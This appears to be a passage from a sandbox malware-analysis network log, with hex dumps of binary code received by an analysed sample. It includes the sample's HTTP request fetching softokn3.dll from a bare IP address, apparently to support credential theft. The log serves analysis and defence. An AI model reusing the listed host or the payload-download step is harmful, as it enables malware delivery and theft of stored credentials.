2024-04-23 23:45:05 UTC	16384	IN	Data Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
2024-04-23 23:45:05 UTC	16384	IN	Data Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83 Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
2024-04-23 23:45:05 UTC	16384	IN	Data Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
2024-04-23 23:45:06 UTC	16384	IN	Data Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00 Data Ascii: h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
2024-04-23 23:45:06 UTC	16384	IN	Data Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
2024-04-23 23:45:06 UTC	16384	IN	Data Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02 Data Ascii: WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
2024-04-23 23:45:06 UTC	16384	IN	Data Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9 Data Ascii: D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:45:08 UTC	157	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Cache-Control: no-cache
2024-04-23 23:45:09 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 23:45:08 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-3ef50" Accept-Ranges: bytes
2024-04-23 23:45:09 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-04-23 23:45:09 UTC	16384	IN	Data Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(^_[]]
2024-04-23 23:45:09 UTC	16384	IN	Data Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8 Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
2024-04-23 23:45:09 UTC	16384	IN	Data Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71 Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
2024-04-23 23:45:09 UTC	16384	IN	Data Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c Data Ascii: !=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7\|
2024-04-23 23:45:09 UTC	16384	IN	Data Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
2024-04-23 23:45:09 UTC	16384	IN	Data Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZVxM@
2024-04-23 23:45:10 UTC	16384	IN	Data Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73 Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
2024-04-23 23:45:10 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00 Data Ascii: USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|~
2024-04-23 23:45:10 UTC	16384	IN	Data Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK